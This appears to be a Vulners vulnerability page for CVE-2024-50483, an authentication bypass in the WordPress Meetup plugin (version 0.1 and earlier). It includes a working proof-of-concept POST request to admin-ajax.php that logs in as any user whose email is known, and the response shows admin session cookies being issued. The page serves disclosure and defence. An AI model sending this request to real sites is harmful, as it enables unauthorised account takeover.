Vulners
Lucene search
WordPress Meetup 0.1 Authentication Bypass Vulnerability
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Exploit for Authorization Bypass Through User-Controlled Key in Tareqhasan Meetup | 5 Nov 202421:38 | – | githubexploit |
 | CVE-2024-50483 | 28 Oct 202415:19 | – | circl |
 | WordPress plugin Meetup 安全漏洞 | 28 Oct 202400:00 | – | cnnvd |
 | CVE-2024-50483 | 28 Oct 202412:29 | – | cve |
 | CVE-2024-50483 WordPress Meetup plugin <= 0.1 - Broken Authentication vulnerability | 28 Oct 202412:29 | – | cvelist |
 | CVE-2024-50483 | 28 Oct 202413:15 | – | nvd |
 | CVE-2024-50483 | 28 Oct 202413:15 | – | osv |
 | WordPress Meetup 0.1 Authentication Bypass | 7 Nov 202400:00 | – | packetstorm |
 | WordPress Meetup plugin <= 0.1 - Broken Authentication vulnerability | 25 Oct 202408:11 | – | patchstack |
| WordPress Meetup Plugin <= 0.1 is vulnerable to Broken Authentication | 25 Oct 202400:00 | – | patchstack |
10
# CVE-2024-50483
Meetup <= 0.1 - Authentication Bypass via Account Takeover
# Description:
The Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.
```
CVE: CVE-2024-50483
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: meetup
```
Note: You need to know the users email address you want to login as.
POC
---
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
action=meetup_fb_register&[email protected]&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/
```
Response
--
```
HTTP/1.1 200 OK
Date: Tue, 05 Nov 2024 21:37:23 GMT
Server: Apache/2.4.57 (Debian)
X-Powered-By: PHP/8.2.13
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnly
Set-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnly
Set-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnly
Content-Length: 0
Content-Type: text/html; charset=UTF-8
```
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Nov 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 3.19.8
EPSS0.5397
SSVC